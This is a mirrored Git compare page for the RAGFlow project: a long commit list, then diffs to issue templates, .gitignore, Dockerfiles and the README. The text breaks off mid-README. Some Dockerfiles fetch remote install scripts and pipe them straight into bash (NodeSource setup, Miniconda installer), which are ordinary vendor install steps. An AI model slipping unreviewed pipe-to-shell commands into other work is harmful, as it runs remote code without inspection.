mirror of
https://github.com/infiniflow/ragflow.git
synced 2025-12-08 20:42:30 +08:00
Compare commits
423 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
| 3413f43b47 | |||
| f8aa31b159 | |||
| 669d634d74 | |||
| 59417016a8 | |||
| 1eb1f7ad33 | |||
| 98295caffe | |||
| f5dc94fc85 | |||
| c889ef6363 | |||
| 593c20889d | |||
| fce3f6df8e | |||
| 61557a101a | |||
| 1f967191d4 | |||
| 0f597b9817 | |||
| 1cff117dc9 | |||
| e3f5464457 | |||
| 6144a109ab | |||
| b3ebc66b13 | |||
| dcb3fb2073 | |||
| f4674ae9d0 | |||
| de610091eb | |||
| d57a68bc2a | |||
| a2eb0df875 | |||
| edc61e9b4c | |||
| 472fcba7af | |||
| 74ec3bc4d9 | |||
| a3f4258cfc | |||
| cf542e80b3 | |||
| 957cd55e4a | |||
| 25a8c076bf | |||
| 306108fe0e | |||
| daaf6aed50 | |||
| 3b50389ee7 | |||
| 258c9ea644 | |||
| acd78c5ef2 | |||
| 1d3e4844a5 | |||
| 4122695a1a | |||
| 3ccb62910b | |||
| a6765e9ca4 | |||
| dec3bf7503 | |||
| 745e98e56a | |||
| 1defc83506 | |||
| 65e59862e4 | |||
| 477a52620f | |||
| 7c9ea5cad9 | |||
| f6159ee4d3 | |||
| a7423e3a94 | |||
| 25c4c717cb | |||
| f9adeb9647 | |||
| 04487d1bce | |||
| 68b9a857c2 | |||
| 5fa3c2bdce | |||
| b5389f487c | |||
| 8b1c145e56 | |||
| 92e9320657 | |||
| 5eb21b9c7c | |||
| 4542346f18 | |||
| fc7cc1d36c | |||
| 751447bd4f | |||
| f26d01dfa3 | |||
| cd3c739982 | |||
| 44c7a0e281 | |||
| 8c9b54db31 | |||
| 6a7c2112f7 | |||
| 0acf4194ca | |||
| 89004f1faf | |||
| 5a36866cf2 | |||
| c8523dc6fd | |||
| 840e921e96 | |||
| 5a1e01d96f | |||
| fbb8cbfc67 | |||
| 0ce720a247 | |||
| 47926a95ae | |||
| ff8793a031 | |||
| a95c1d45f0 | |||
| 45853505bb | |||
| b3f782b3d3 | |||
| 16a1d24a02 | |||
| a943aefa4d | |||
| 038ca8c0ea | |||
| fa5695c250 | |||
| e43208a1ca | |||
| fef663a59d | |||
| 83b91d90fe | |||
| f6ae8fcb71 | |||
| d1ea429bdd | |||
| b75bb1d8d3 | |||
| 6c6f5a3a47 | |||
| 80163c043e | |||
| 9fcf9a10c6 | |||
| 38bd02f402 | |||
| 9a0736b20f | |||
| 4fcd05ad23 | |||
| f8fe4154e8 | |||
| 57970570ee | |||
| d185a2e7f2 | |||
| a4ea5a120b | |||
| 15bf9f8c25 | |||
| 18f4a6b35c | |||
| f7cdb2678c | |||
| 3c1444ab19 | |||
| fb56a29478 | |||
| e99e8b93fb | |||
| 5ec19b5f53 | |||
| 0b90aab22c | |||
| fe1805fa0e | |||
| f73f7b969c | |||
| 81d1c5a695 | |||
| 8d667d5abd | |||
| 01ad2e5296 | |||
| fcdda9f8c5 | |||
| e35f7610e7 | |||
| 7920a5c78d | |||
| 4d957f2d3b | |||
| a89389a05a | |||
| d9a9be4b4c | |||
| 6be3626372 | |||
| 1eb4caf02a | |||
| f04fb36c26 | |||
| 747e69ef68 | |||
| c68767acdd | |||
| 4447039a4c | |||
| 90975460af | |||
| 7dc39cbfa6 | |||
| a25d32496c | |||
| 2023fdc13e | |||
| 64c83f300a | |||
| 3b7b6240c3 | |||
| e05395d2a7 | |||
| 169281958b | |||
| abcd3d2469 | |||
| 2cc89211f6 | |||
| 0e3a877e5c | |||
| da64cfd173 | |||
| ff5ea266d2 | |||
| 8902d92d0e | |||
| e28d13e3b4 | |||
| 0b92f02672 | |||
| cf2f6592dd | |||
| 97ced2f667 | |||
| 7eb69fe6d9 | |||
| 68a698655a | |||
| f900e432f3 | |||
| 267d6b28be | |||
| 706985c188 | |||
| 59efba3d87 | |||
| 22468a8590 | |||
| d0951ee27b | |||
| 31da511d1d | |||
| f8d0d657fb | |||
| 923c3b8cac | |||
| 2ff1b410b9 | |||
| f65d6a957b | |||
| 722c342d56 | |||
| dbdae8e83c | |||
| 6399a4fde2 | |||
| 631753f1a9 | |||
| ad87825a1b | |||
| b04f0510f9 | |||
| 1552dca28d | |||
| db35e9df4f | |||
| d9dc183a0e | |||
| 195498daaa | |||
| 4454ba7a1e | |||
| 72c6784ff8 | |||
| b6980d8a16 | |||
| 39ac3b1e60 | |||
| b8eedbdd86 | |||
| 8295979bb2 | |||
| 037657c1ce | |||
| 4fba0427eb | |||
| c74d4d683e | |||
| 0b15c47d70 | |||
| 7d41de42a1 | |||
| 9517a27844 | |||
| cc064040a2 | |||
| cdea1d0a85 | |||
| 1de31ca9f6 | |||
| 4ec845c0a6 | |||
| c58a1c48eb | |||
| fefe7124a1 | |||
| ebdc283cd5 | |||
| 260c68f60c | |||
| 5d2f7136dd | |||
| b85c15cc96 | |||
| 9ed0e50f6b | |||
| b9bb11879f | |||
| dc7afe46fb | |||
| 4f4d8baf49 | |||
| 83803a72ee | |||
| c3c2515691 | |||
| 117a173fff | |||
| 77363a0875 | |||
| 843720f958 | |||
| f077b57f8b | |||
| c62834f870 | |||
| 0171082cc5 | |||
| 8dd45459be | |||
| dded365b8d | |||
| 9fdd517af6 | |||
| 2604ded2e4 | |||
| 758eb03ccb | |||
| e0d05a3895 | |||
| 614defec21 | |||
| e1f0644deb | |||
| a135f9f5b6 | |||
| daa4799385 | |||
| 495a6434ec | |||
| 21aac545d9 | |||
| 0f317221b4 | |||
| a427672229 | |||
| 196f2b445f | |||
| 5041677f11 | |||
| 7eee193956 | |||
| 9ffd7ae321 | |||
| ec6ae744a1 | |||
| d9bc093df1 | |||
| 571aaaff22 | |||
| 7d8e03ec38 | |||
| 65677f65c9 | |||
| 89d296feab | |||
| 3ae8a87986 | |||
| 46454362d7 | |||
| 55fb96131e | |||
| 20b57144b0 | |||
| 9e3a0e4d03 | |||
| c0d71adaa2 | |||
| 735bdf06a4 | |||
| fe18627ebc | |||
| 4cda40c3ef | |||
| 1e5c5abe58 | |||
| 6f99bbbb08 | |||
| 3bbdf3b770 | |||
| 070b53f3bf | |||
| eb51ad73d6 | |||
| fbd0d74053 | |||
| 170186ee4d | |||
| ed184ed87e | |||
| 43412571f7 | |||
| 17489e6c6c | |||
| 21453ffff0 | |||
| be13429d05 | |||
| 5178daeeaf | |||
| d5b8d8e647 | |||
| b62a20816e | |||
| 3cae87a902 | |||
| 1797f5ce31 | |||
| fe4b2e4670 | |||
| 250119e03a | |||
| bae376a479 | |||
| 6c32f80bc9 | |||
| 7e74546b73 | |||
| 25781113f9 | |||
| 16fa7db737 | |||
| a12fcf9156 | |||
| c27c02ea67 | |||
| 71068895ae | |||
| 93b35f4e58 | |||
| 9a01d1b876 | |||
| a7bd427116 | |||
| 2b36283712 | |||
| 6683179d6a | |||
| 673a28e492 | |||
| 2bfacd0469 | |||
| b3c923da6b | |||
| a1586e0af9 | |||
| f6a599461f | |||
| 081f922ee6 | |||
| 9f0f5b45cc | |||
| a2a6a35e94 | |||
| 9e5d501e83 | |||
| 4ca176bd41 | |||
| c3bc72dfd9 | |||
| 2dd705fe68 | |||
| d1614107e2 | |||
| 05fa3aeb08 | |||
| e73ce39b66 | |||
| d54d1375a5 | |||
| c6c9dbde64 | |||
| 95f809187e | |||
| d6772f5dd7 | |||
| 63ca15c595 | |||
| 7b144cc086 | |||
| 1c4e92ed35 | |||
| 10e83f26dc | |||
| 6ff63ee2ba | |||
| 12b4c5668c | |||
| baad35df30 | |||
| 5effbfac80 | |||
| 4d47b2b459 | |||
| d8c080ee52 | |||
| 626ace8639 | |||
| 1e923f1c90 | |||
| 234afb25d8 | |||
| aa1c915d6e | |||
| 77b1520b66 | |||
| 6b06ccead4 | |||
| 282f0857a3 | |||
| d7744f5870 | |||
| 9b21b66f23 | |||
| aa03dfa453 | |||
| 69b7c61498 | |||
| 8769619bb1 | |||
| ffe5737f7d | |||
| 04a9e95161 | |||
| 91b4a18c47 | |||
| 33eaf6fa2e | |||
| d65ba3e4d7 | |||
| bef1bbdf3e | |||
| 6b36f31f92 | |||
| 648a2baaa9 | |||
| 9392b8bc8f | |||
| 4153a36683 | |||
| bca63ad571 | |||
| 793e29f23a | |||
| 99be226c7c | |||
| 7ddb2f19be | |||
| c28f7b5d38 | |||
| 48607c3cfb | |||
| d15ba37313 | |||
| a553dc8dbd | |||
| eb27a4309e | |||
| 48e1534bf4 | |||
| e9d19c4684 | |||
| 8d6d7f6887 | |||
| a6e4b74d94 | |||
| a5aed2412f | |||
| 2810c60757 | |||
| 62afcf5ac8 | |||
| a74c755d83 | |||
| 7013d7f620 | |||
| de839fc3f0 | |||
| c6b6c748ae | |||
| ca5acc151a | |||
| 385dbe5ab5 | |||
| 3050a8cb07 | |||
| 9c77d367d0 | |||
| 5f03a4de11 | |||
| 290e5d958d | |||
| 9703633a57 | |||
| 7d3b68bb1e | |||
| c89f3c3cdb | |||
| 5d7f573379 | |||
| cab274f560 | |||
| 7059ec2298 | |||
| 674b3aeafd | |||
| 4c1476032d | |||
| 2af74cc494 | |||
| 38f0cc016f | |||
| 6874c6f3a7 | |||
| 8acc01a227 | |||
| 8c07992b6c | |||
| aee8b48d2f | |||
| daf215d266 | |||
| cdcc779705 | |||
| d589b0f568 | |||
| 9d60a84958 | |||
| aadb9cbec8 | |||
| 038822f3bd | |||
| ae501c58fa | |||
| 944776f207 | |||
| f1c98aad6b | |||
| ab06f502d7 | |||
| 6329339a32 | |||
| 84b39c60f6 | |||
| eb62c669ae | |||
| f69ff39fa0 | |||
| b1cd203904 | |||
| b75d75e995 | |||
| 76c477f211 | |||
| 1b01c4fe69 | |||
| 188f3ddfc5 | |||
| 1dcd439c58 | |||
| 26003b5076 | |||
| 4130e5c5e5 | |||
| d0af2f92f2 | |||
| 66f8d35632 | |||
| cf9b554c3a | |||
| aeabc0c9a4 | |||
| 9db44da992 | |||
| 51e7697df7 | |||
| b06d6395bb | |||
| b79f0b0cac | |||
| fe51488973 | |||
| 5d1803c31d | |||
| bd76a82c1f | |||
| 2bc9a7cc18 | |||
| 2d228dbf7f | |||
| 369400c483 | |||
| 6405041b4d | |||
| aa71462a9f | |||
| 72384b191d | |||
| 0dfc8ddc0f | |||
| 78402d9a57 | |||
| b448c212ee | |||
| 0aaade088b | |||
| a38e163035 | |||
| 3610e1e5b4 | |||
| 11949f9f2e | |||
| b8e58fe27a | |||
| fc87c20bd8 | |||
| dee6299ddf | |||
| 101df2b470 | |||
| c055f40dff | |||
| 7da3f88e54 | |||
| 10b79effab | |||
| 7e41b4bc94 | |||
| ed6081845a | |||
| cda7b607cb | |||
| 962c66714e | |||
| 39f1feaccb | |||
| 1dada69daa | |||
| fe2f5205fc | |||
| ac574af60a | |||
| 0499a3f621 | |||
| 453c29170f | |||
| e8570da856 | |||
| dd7559a009 | |||
| 3719ff7299 | |||
| 800b5c7aaa | |||
| f12f30bb7b | |||
| 30846c83b2 | |||
| 2afe7a74b3 | |||
| d4e0bfc8a5 |
1
.gitattributes
vendored
Normal file
1
.gitattributes
vendored
Normal file
@ -0,0 +1 @@
|
||||
*.sh text eol=lf
|
||||
2
.github/ISSUE_TEMPLATE/bug_report.yml
vendored
2
.github/ISSUE_TEMPLATE/bug_report.yml
vendored
@ -1,5 +1,5 @@
|
||||
name: Bug Report
|
||||
description: Create a bug issue for infinity
|
||||
description: Create a bug issue for RAGFlow
|
||||
title: "[Bug]: "
|
||||
labels: [bug]
|
||||
body:
|
||||
|
||||
2
.github/ISSUE_TEMPLATE/feature_request.md
vendored
2
.github/ISSUE_TEMPLATE/feature_request.md
vendored
@ -1,7 +1,7 @@
|
||||
---
|
||||
name: Feature request
|
||||
title: '[Feature Request]: '
|
||||
about: Suggest an idea for Infinity
|
||||
about: Suggest an idea for RAGFlow
|
||||
labels: ''
|
||||
---
|
||||
|
||||
|
||||
2
.github/ISSUE_TEMPLATE/feature_request.yml
vendored
2
.github/ISSUE_TEMPLATE/feature_request.yml
vendored
@ -1,5 +1,5 @@
|
||||
name: Feature request
|
||||
description: Propose a feature request for infinity.
|
||||
description: Propose a feature request for RAGFlow.
|
||||
title: "[Feature Request]: "
|
||||
labels: [feature request]
|
||||
body:
|
||||
|
||||
2
.github/ISSUE_TEMPLATE/question.yml
vendored
2
.github/ISSUE_TEMPLATE/question.yml
vendored
@ -1,5 +1,5 @@
|
||||
name: Question
|
||||
description: Ask questions on infinity
|
||||
description: Ask questions on RAGFlow
|
||||
title: "[Question]: "
|
||||
labels: [question]
|
||||
body:
|
||||
|
||||
2
.github/ISSUE_TEMPLATE/subtask.yml
vendored
2
.github/ISSUE_TEMPLATE/subtask.yml
vendored
@ -1,5 +1,5 @@
|
||||
name: Subtask
|
||||
description: "Propose a subtask for infinity"
|
||||
description: "Propose a subtask for RAGFlow"
|
||||
title: "[Subtask]: "
|
||||
labels: [subtask]
|
||||
|
||||
|
||||
5
.github/pull_request_template.md
vendored
5
.github/pull_request_template.md
vendored
@ -2,16 +2,11 @@
|
||||
|
||||
_Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._
|
||||
|
||||
Issue link:#[Link the issue here]
|
||||
|
||||
### Type of change
|
||||
|
||||
- [ ] Bug Fix (non-breaking change which fixes an issue)
|
||||
- [ ] New Feature (non-breaking change which adds functionality)
|
||||
- [ ] Breaking Change (fix or feature that could cause existing functionality not to work as expected)
|
||||
- [ ] Documentation Update
|
||||
- [ ] Refactoring
|
||||
- [ ] Performance Improvement
|
||||
- [ ] Test cases
|
||||
- [ ] Python SDK impacted, Need to update PyPI
|
||||
- [ ] Other (please describe):
|
||||
|
||||
15
.gitignore
vendored
15
.gitignore
vendored
@ -21,3 +21,18 @@ Cargo.lock
|
||||
|
||||
.idea/
|
||||
.vscode/
|
||||
|
||||
# Exclude Mac generated files
|
||||
.DS_Store
|
||||
|
||||
# Exclude the log folder
|
||||
docker/ragflow-logs/
|
||||
/flask_session
|
||||
/logs
|
||||
rag/res/deepdoc
|
||||
|
||||
# Exclude sdk generated files
|
||||
sdk/python/ragflow.egg-info/
|
||||
sdk/python/build/
|
||||
sdk/python/dist/
|
||||
sdk/python/ragflow_sdk.egg-info/
|
||||
@ -1,20 +1,22 @@
|
||||
FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
|
||||
FROM infiniflow/ragflow-base:v2.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i && npm run build
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./graph ./graph
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
ADD docker/.env ./
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
33
Dockerfile.arm
Normal file
33
Dockerfile.arm
Normal file
@ -0,0 +1,33 @@
|
||||
FROM python:3.11
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
COPY requirements_arm.txt /ragflow/requirements.txt
|
||||
RUN pip install -i https://mirrors.aliyun.com/pypi/simple/ --default-timeout=1000 -r requirements.txt &&\
|
||||
python -c "import nltk;nltk.download('punkt');nltk.download('wordnet')"
|
||||
|
||||
RUN apt-get update && \
|
||||
apt-get install -y curl gnupg && \
|
||||
rm -rf /var/lib/apt/lists/*
|
||||
|
||||
RUN curl -sL https://deb.nodesource.com/setup_20.x | bash - && \
|
||||
apt-get install -y --fix-missing nodejs nginx ffmpeg libsm6 libxext6 libgl1
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./graph ./graph
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
ADD docker/.env ./
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
@ -1,4 +1,4 @@
|
||||
FROM swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow-base:v1.0
|
||||
FROM infiniflow/ragflow-base:v2.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
@ -9,7 +9,7 @@ RUN /root/miniconda3/envs/py11/bin/pip install onnxruntime-gpu --extra-index-url
|
||||
|
||||
|
||||
ADD ./web ./web
|
||||
RUN cd ./web && npm i && npm run build
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
|
||||
@ -30,11 +30,12 @@ ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
ADD ./graph ./graph
|
||||
|
||||
RUN apt install openmpi-bin openmpi-common libopenmpi-dev
|
||||
ENV LD_LIBRARY_PATH /usr/lib/x86_64-linux-gnu/openmpi/lib:$LD_LIBRARY_PATH
|
||||
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
||||
RUN cd ./web && npm i && npm run build
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
RUN conda run -n py11 pip install -i https://mirrors.aliyun.com/pypi/simple/ -r ./requirements.txt
|
||||
|
||||
RUN apt-get update && \
|
||||
|
||||
57
Dockerfile.scratch.oc9
Normal file
57
Dockerfile.scratch.oc9
Normal file
@ -0,0 +1,57 @@
|
||||
FROM opencloudos/opencloudos:9.0
|
||||
USER root
|
||||
|
||||
WORKDIR /ragflow
|
||||
|
||||
RUN dnf update -y && dnf install -y wget curl gcc-c++ openmpi-devel
|
||||
|
||||
RUN wget https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh -O ~/miniconda.sh && \
|
||||
bash ~/miniconda.sh -b -p /root/miniconda3 && \
|
||||
rm ~/miniconda.sh && ln -s /root/miniconda3/etc/profile.d/conda.sh /etc/profile.d/conda.sh && \
|
||||
echo ". /root/miniconda3/etc/profile.d/conda.sh" >> ~/.bashrc && \
|
||||
echo "conda activate base" >> ~/.bashrc
|
||||
|
||||
ENV PATH /root/miniconda3/bin:$PATH
|
||||
|
||||
RUN conda create -y --name py11 python=3.11
|
||||
|
||||
ENV CONDA_DEFAULT_ENV py11
|
||||
ENV CONDA_PREFIX /root/miniconda3/envs/py11
|
||||
ENV PATH $CONDA_PREFIX/bin:$PATH
|
||||
|
||||
# RUN curl -sL https://rpm.nodesource.com/setup_14.x | bash -
|
||||
RUN dnf install -y nodejs
|
||||
|
||||
RUN dnf install -y nginx
|
||||
|
||||
ADD ./web ./web
|
||||
ADD ./api ./api
|
||||
ADD ./conf ./conf
|
||||
ADD ./deepdoc ./deepdoc
|
||||
ADD ./rag ./rag
|
||||
ADD ./requirements.txt ./requirements.txt
|
||||
ADD ./graph ./graph
|
||||
|
||||
RUN dnf install -y openmpi openmpi-devel python3-openmpi
|
||||
ENV C_INCLUDE_PATH /usr/include/openmpi-x86_64:$C_INCLUDE_PATH
|
||||
ENV LD_LIBRARY_PATH /usr/lib64/openmpi/lib:$LD_LIBRARY_PATH
|
||||
RUN rm /root/miniconda3/envs/py11/compiler_compat/ld
|
||||
RUN cd ./web && npm i --force && npm run build
|
||||
RUN conda run -n py11 pip install $(grep -ivE "mpi4py" ./requirements.txt) # without mpi4py==3.1.5
|
||||
RUN conda run -n py11 pip install redis
|
||||
|
||||
RUN dnf update -y && \
|
||||
dnf install -y glib2 mesa-libGL && \
|
||||
dnf clean all
|
||||
|
||||
RUN conda run -n py11 pip install ollama
|
||||
RUN conda run -n py11 python -m nltk.downloader punkt
|
||||
RUN conda run -n py11 python -m nltk.downloader wordnet
|
||||
|
||||
ENV PYTHONPATH=/ragflow/
|
||||
ENV HF_ENDPOINT=https://hf-mirror.com
|
||||
|
||||
ADD docker/entrypoint.sh ./entrypoint.sh
|
||||
RUN chmod +x ./entrypoint.sh
|
||||
|
||||
ENTRYPOINT ["./entrypoint.sh"]
|
||||
188
README.md
188
README.md
@ -11,19 +11,69 @@
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<a href="https://github.com/infiniflow/ragflow/releases/latest">
|
||||
<img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
|
||||
</a>
|
||||
<a href="https://demo.ragflow.io" target="_blank">
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
|
||||
<img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99"></a>
|
||||
<a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v1.0-brightgreen"
|
||||
alt="docker pull infiniflow/ragflow:v0.2.0"></a>
|
||||
<img src="https://img.shields.io/badge/docker_pull-ragflow:v0.8.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.8.0"></a>
|
||||
<a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
|
||||
<img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
|
||||
</a>
|
||||
</p>
|
||||
|
||||
<h4 align="center">
|
||||
<a href="https://ragflow.io/docs/dev/">Document</a> |
|
||||
<a href="https://github.com/infiniflow/ragflow/issues/162">Roadmap</a> |
|
||||
<a href="https://twitter.com/infiniflowai">Twitter</a> |
|
||||
<a href="https://discord.gg/4XxujFgUN7">Discord</a> |
|
||||
<a href="https://demo.ragflow.io">Demo</a>
|
||||
</h4>
|
||||
|
||||
<details open>
|
||||
<summary></b>📕 Table of Contents</b></summary>
|
||||
|
||||
- 💡 [What is RAGFlow?](#-what-is-ragflow)
|
||||
- 🎮 [Demo](#-demo)
|
||||
- 📌 [Latest Updates](#-latest-updates)
|
||||
- 🌟 [Key Features](#-key-features)
|
||||
- 🔎 [System Architecture](#-system-architecture)
|
||||
- 🎬 [Get Started](#-get-started)
|
||||
- 🔧 [Configurations](#-configurations)
|
||||
- 🛠️ [Build from source](#-build-from-source)
|
||||
- 🛠️ [Launch service from source](#-launch-service-from-source)
|
||||
- 📚 [Documentation](#-documentation)
|
||||
- 📜 [Roadmap](#-roadmap)
|
||||
- 🏄 [Community](#-community)
|
||||
- 🙌 [Contributing](#-contributing)
|
||||
|
||||
</details>
|
||||
|
||||
## 💡 What is RAGFlow?
|
||||
|
||||
[RAGFlow](https://demo.ragflow.io) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
[RAGFlow](https://ragflow.io/) is an open-source RAG (Retrieval-Augmented Generation) engine based on deep document understanding. It offers a streamlined RAG workflow for businesses of any scale, combining LLM (Large Language Models) to provide truthful question-answering capabilities, backed by well-founded citations from various complex formatted data.
|
||||
|
||||
## 🎮 Demo
|
||||
|
||||
Try our demo at [https://demo.ragflow.io](https://demo.ragflow.io).
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
<img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
|
||||
</div>
|
||||
|
||||
|
||||
## 📌 Latest Updates
|
||||
|
||||
- 2024-07-08 Supports [Graph](./graph/README.md).
|
||||
|
||||
- 2024-06-27 Supports Markdown and Docx in the Q&A parsing method. Supports extracting images from Docx files. Supports extracting tables from Markdown files.
|
||||
- 2024-06-14 Supports PDF in the Q&A parsing method.
|
||||
- 2024-06-06 Supports [Self-RAG](https://huggingface.co/papers/2310.11511), which is enabled by default in dialog settings.
|
||||
- 2024-05-30 Integrates [BCE](https://github.com/netease-youdao/BCEmbedding) and [BGE](https://github.com/FlagOpen/FlagEmbedding) reranker models.
|
||||
- 2024-05-28 Supports LLM Baichuan and VolcanoArk.
|
||||
- 2024-05-23 Supports [RAPTOR](https://arxiv.org/html/2401.18059v1) for better text retrieval.
|
||||
- 2024-05-21 Supports streaming output and text chunk retrieval API.
|
||||
- 2024-05-15 Integrates OpenAI GPT-4o.
|
||||
|
||||
## 🌟 Key Features
|
||||
|
||||
@ -53,15 +103,6 @@
|
||||
- Multiple recall paired with fused re-ranking.
|
||||
- Intuitive APIs for seamless integration with business.
|
||||
|
||||
## 📌 Latest Features
|
||||
|
||||
- 2024-04-16 Add an embedding model 'bce-embedding-base_v1' from [BCEmbedding](https://github.com/netease-youdao/BCEmbedding).
|
||||
- 2024-04-16 Add [FastEmbed](https://github.com/qdrant/fastembed) is designed for light and speeding embedding.
|
||||
- 2024-04-11 Support [Xinference](./docs/xinference.md) for local LLM deployment.
|
||||
- 2024-04-10 Add a new layout recognization model for analyzing Laws documentation.
|
||||
- 2024-04-08 Support [Ollama](./docs/ollama.md) for local LLM deployment.
|
||||
- 2024-04-07 Support Chinese UI.
|
||||
|
||||
## 🔎 System Architecture
|
||||
|
||||
<div align="center" style="margin-top:20px;margin-bottom:20px;">
|
||||
@ -72,14 +113,15 @@
|
||||
|
||||
### 📝 Prerequisites
|
||||
|
||||
- CPU >= 2 cores
|
||||
- RAM >= 8 GB
|
||||
- CPU >= 4 cores
|
||||
- RAM >= 16 GB
|
||||
- Disk >= 50 GB
|
||||
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
|
||||
> If you have not installed Docker on your local machine (Windows, Mac, or Linux), see [Install Docker Engine](https://docs.docker.com/engine/install/).
|
||||
|
||||
### 🚀 Start up the server
|
||||
|
||||
1. Ensure `vm.max_map_count` >= 262144 ([more](./docs/max_map_count.md)):
|
||||
1. Ensure `vm.max_map_count` >= 262144:
|
||||
|
||||
> To check the value of `vm.max_map_count`:
|
||||
>
|
||||
@ -108,12 +150,15 @@
|
||||
|
||||
3. Build the pre-built Docker images and start up the server:
|
||||
|
||||
> Running the following commands automatically downloads the *dev* version RAGFlow Docker image. To download and run a specified Docker version, update `RAGFLOW_VERSION` in **docker/.env** to the intended version, for example `RAGFLOW_VERSION=v0.8.0`, before running the following commands.
|
||||
|
||||
```bash
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
|
||||
> The core image is about 9 GB in size and may take a while to load.
|
||||
|
||||
4. Check the server status after having the server up and running:
|
||||
@ -137,12 +182,13 @@
|
||||
* Running on http://x.x.x.x:9380
|
||||
INFO:werkzeug:Press CTRL+C to quit
|
||||
```
|
||||
> If you skip this confirmation step and directly log in to RAGFlow, your browser may prompt a `network anomaly` error because, at that moment, your RAGFlow may not be fully initialized.
|
||||
|
||||
5. In your web browser, enter the IP address of your server and log in to RAGFlow.
|
||||
> In the given scenario, you only need to enter `http://IP_OF_YOUR_MACHINE` (sans port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
> With the default settings, you only need to enter `http://IP_OF_YOUR_MACHINE` (**sans** port number) as the default HTTP serving port `80` can be omitted when using the default configurations.
|
||||
6. In [service_conf.yaml](./docker/service_conf.yaml), select the desired LLM factory in `user_default_llm` and update the `API_KEY` field with the corresponding API key.
|
||||
|
||||
> See [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) for more information.
|
||||
> See [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) for more information.
|
||||
|
||||
_The show is now on!_
|
||||
|
||||
@ -173,15 +219,112 @@ To build the Docker images from source:
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
$ docker build -t infiniflow/ragflow:v0.2.0 .
|
||||
$ docker build -t infiniflow/ragflow:dev .
|
||||
$ cd ragflow/docker
|
||||
$ chmod +x ./entrypoint.sh
|
||||
$ docker compose up -d
|
||||
```
|
||||
|
||||
## 🛠️ Launch service from source
|
||||
|
||||
To launch the service from source:
|
||||
|
||||
1. Clone the repository:
|
||||
|
||||
```bash
|
||||
$ git clone https://github.com/infiniflow/ragflow.git
|
||||
$ cd ragflow/
|
||||
```
|
||||
|
||||
2. Create a virtual environment, ensuring that Anaconda or Miniconda is installed:
|
||||
|
||||
```bash
|
||||
$ conda create -n ragflow python=3.11.0
|
||||
$ conda activate ragflow
|
||||
$ pip install -r requirements.txt
|
||||
```
|
||||
|
||||
```bash
|
||||
# If your CUDA version is higher than 12.0, run the following additional commands:
|
||||
$ pip uninstall -y onnxruntime-gpu
|
||||
$ pip install onnxruntime-gpu --extra-index-url https://aiinfra.pkgs.visualstudio.com/PublicPackages/_packaging/onnxruntime-cuda-12/pypi/simple/
|
||||
```
|
||||
|
||||
3. Copy the entry script and configure environment variables:
|
||||
|
||||
```bash
|
||||
# Get the Python path:
|
||||
$ which python
|
||||
# Get the ragflow project path:
|
||||
$ pwd
|
||||
```
|
||||
|
||||
```bash
|
||||
$ cp docker/entrypoint.sh .
|
||||
$ vi entrypoint.sh
|
||||
```
|
||||
|
||||
```bash
|
||||
